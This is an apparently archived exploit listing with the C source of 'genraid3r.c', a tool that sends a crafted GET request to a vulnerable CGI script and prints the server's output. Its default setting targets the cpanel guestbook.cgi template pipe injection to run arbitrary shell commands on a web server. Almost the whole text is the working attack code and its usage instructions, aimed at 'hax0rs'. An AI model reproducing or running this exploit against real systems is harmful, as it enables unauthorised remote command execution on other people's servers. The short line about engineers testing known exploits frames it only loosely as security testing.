CGI exploit generator that enables an engineer to test standard known CGI exploits with a utility that is customizable which will print to STDOUT and without the need for a browser.
3eb298af0962a1ec44d0eb30d644bfef3f2f5da8fd6b0504d9d074903fab561d/* Begin genraid3r.c */
/* By J0hny_Lightning */
/* j0hnylightning@hotmail.com */
/*
** genraid3r.c is a cgi exploit generator for
** lazy hax0rs who don't want to use the web
** browser to do their stuff. All u need to do
** is modify some of the strings and compile
** to get an exploit for whatever cgi vuln.
** It will execute your command on the web
** server and print the output to stdout.
** Tested on FreeBSD 4.6.
**
** The strings you will need to change are:
** 1) PATH This is the path to the vulnerable
** script. (ie: "/cgi-bin/forum/postit.cgi" )
**
** 2) PART_ONE This is a string that is the first series
** of arguements to the vulnerable script
** before the command is executed. For example
** if your are exploiting the cpanel
** guestbook.cgi you should set part_one to:
** "?user=cpanel&template=|"
**
** 3) PART_TWO This is a string that is the last series of
** arguements to be passed to the script after
** the command to be executed. Sticking with
** our example, part_two should be set to "|"
**
** Compile using: gcc genraid3r.c -o genraid3r
** Usage: ./genraid3r <hostname> <command>
**
** Note: When you specify <command> if it has a space
** make sure to specify the unicode representation
** of the space character. (ie: ls -al should be ls%20-al)
**
*/
/* Includes */
#include <stdio.h> // Standard includes for i/o,
#include <errno.h> // error reporting, and string
#include <string.h> // functions.
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h> // Standard includes for
#include <sys/socket.h> // networking functions.
#include <netinet/in.h>
#include <arpa/inet.h>
/* oO0OooO0OooO0Oo Change these defines! oO0OooO0OooO0Oo */
#define PATH "/cgi-sys/guestbook.cgi" /* Path to the script */
#define PART_ONE "?user=cpanel&template=|" /* First set of args */
#define PART_TWO "|" /* 2nd set of args */
/* Changing anything below this line voids the warranty */
#define DEST_PORT 80
#define MAXBUF 1024
int main(int argc, char *argv[]){
int sizock, own3d;
struct hostent *toBeOwned;
struct sockaddr_in addy;
char bizuffer[MAXBUF];
if (argc != 3){
fprintf(stderr, "Usage: %s <host name> <command> \n", argv[0]);
exit(1);
}
if ((toBeOwned=(struct hostent *)gethostbyname(argv[1])) == NULL ){
herror("gethostbyname()");
exit(1);
}
if ((sizock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ){
perror("socket()");
exit(1);
}
addy.sin_family = AF_INET;
addy.sin_port = htons(DEST_PORT);
bcopy(toBeOwned->h_addr, (char *)&addy.sin_addr, toBeOwned->h_length );
memset(&(addy.sin_zero), '\0', 8);
if ((connect(sizock, (struct sockaddr*)&addy, sizeof(addy))) < 0){
perror("connect()");
exit(1);
}
fprintf(stdout,"Hey! Hey! Time for 0day...\n\n");
sprintf(bizuffer, "GET %s%s%s%s \n\n", PATH, PART_ONE, argv[2],
PART_TWO);
send(sizock, bizuffer, strlen(bizuffer), 0);
fflush(stdout);
do
{
bzero(bizuffer, sizeof(bizuffer));
own3d = recv(sizock, bizuffer, sizeof(bizuffer), 0);
if (own3d > 0)
fprintf(stdout, "%s", bizuffer);
}
while (own3d > 0);
close(sizock);
return 0;
}
/* End genraid3r.c */
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed